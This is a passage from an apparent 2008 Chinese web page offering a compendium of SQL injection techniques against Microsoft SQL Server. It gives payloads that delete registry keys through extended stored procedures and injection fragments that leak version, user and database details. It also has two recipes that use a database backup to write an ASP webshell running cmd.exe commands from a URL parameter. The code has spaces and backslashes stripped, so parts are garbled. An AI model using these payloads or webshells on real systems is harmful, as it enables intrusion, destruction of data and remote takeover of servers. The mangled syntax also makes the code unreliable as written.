WEB开发网
开发学院网络安全黑客技术 SQL注入技巧资料大全 阅读

SQL注入技巧资料大全

 2008-10-27 16:51:24 来源:WEB开发网   
核心提示: execxp_regdeletevalue'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsCurrentVersion','TestValueName'删除某个值xp_regdeletekey

execxp_regdeletevalue'HKEY_LOCAL_MACHINE',

'SOFTWAREMicrosoftWindowsCurrentVersion',

'TestValueName'删除某个值

xp_regdeletekey'HKEY_LOCAL_MACHINE',

'SOFTWAREMicrosoftWindowsCurrentVersionTestkey'删除键,包括该键下所有值

14.mssql的backup创建webshell

usemodel

createtablecmd(strimage);

insertintocmd(str)values('<%DimoScript%>');

backupdatabasemodeltodisk='c:l.asp';

15.mssql内置函数

;and(select@@version)>0获得Windows的版本号

;anduser_name()='dbo'判断当前系统的连接用户是不是sa

;and(selectuser_name())>0爆当前系统的连接用户

;and(selectdb_name())>0得到当前连接的数据库

16.简洁的webshell

usemodel

createtablecmd(strimage);

insertintocmd(str)values('<%=server.createobject("wscript.shell").exec("cmd.exe/c"&request("c")).stdout.readall%>');

backupdatabasemodeltodisk='g:wwwtestl.asp';

请求的时候,像这样子用:

http://ip/l.asp?c=dir 

参考资料(自己GOOGLE)

SQL注入天书-ASP注入漏洞全接触(小竹)

MSSQL跨库查询(臭要饭的!黑夜)

榨干MSSQL最后一滴血

SQL语句参考及记录集对象详解

关于SQLServer中存储过程

利用mssqlbackup创建webshell

SQL_Injection高级应用

跨站式SQL注入(老凯(laokai))

怪异的SQL注入(AMANL)

SQLServer应用程序中的高级SQL注入(翻译:青野志狼)

如何利用Sql注入遍历目录(sinkaQQ:20355)

SQLInjection技巧的演练(翻译人:demonalex)

SQL数据库的一些攻击

SQLInjection攻击技术(JSW)

SQL_Injection高级应用(apachy)

SQL注入的不常见方法(桂林老兵)

Backupashell

php+mysql注射语句构造(黑嘿黑·≯Super·Hei)

AdvancedSQLInjectionwithMySQL(angel)

L'injection(My)SQLviaPHP

OracleSQL语言

上一页  1 2 3 

Tags:SQL 注入 技巧

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接